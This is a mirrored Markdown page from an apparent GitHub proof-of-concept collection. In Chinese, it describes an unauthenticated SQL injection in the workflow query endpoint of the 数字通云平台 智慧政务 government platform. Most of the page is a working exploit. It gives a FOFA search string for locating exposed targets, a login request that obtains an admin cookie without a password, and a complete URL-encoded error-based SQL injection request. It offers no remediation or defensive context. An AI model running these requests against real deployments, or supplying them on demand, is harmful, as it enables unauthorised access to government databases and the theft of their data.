mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
43 lines
1.5 KiB
Markdown
43 lines
1.5 KiB
Markdown
# 数字通云平台智慧政务workflow存在SQL注入漏洞
|
||
|
||
数字通云平台 智慧政务 /workflow/query/index 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
|
||
|
||
## fofa
|
||
|
||
```java
|
||
body="assets/8cca19ff/css/bootstrap-yii.css"
|
||
```
|
||
|
||
## poc
|
||
|
||
获取cookie
|
||
|
||
```javascript
|
||
POST /portal/default/login HTTP/1.1
|
||
Host:
|
||
Accept-Encoding: gzip, deflate
|
||
Upgrade-Insecure-Requests: 1
|
||
Priority: u=0, i
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
|
||
|
||
userID=admin&flag=rone
|
||
```
|
||
|
||
携带cookie进行注入
|
||
|
||
```javascript
|
||
GET /workflow/query/index?WfRtApplication%5Bselect_user%5D=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71786b7a71%2C%28SELECT%20%28ELT%285761=5761%2C1%29%29%29%2C0x7162717871%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29 HTTP/1.1
|
||
Host:
|
||
Accept-Encoding: gzip, deflate
|
||
X-Requested-With: XMLHttpRequest
|
||
Priority: u=0
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
|
||
Cookie: your-cookie
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept: */*
|
||
```
|
||
|
||
 |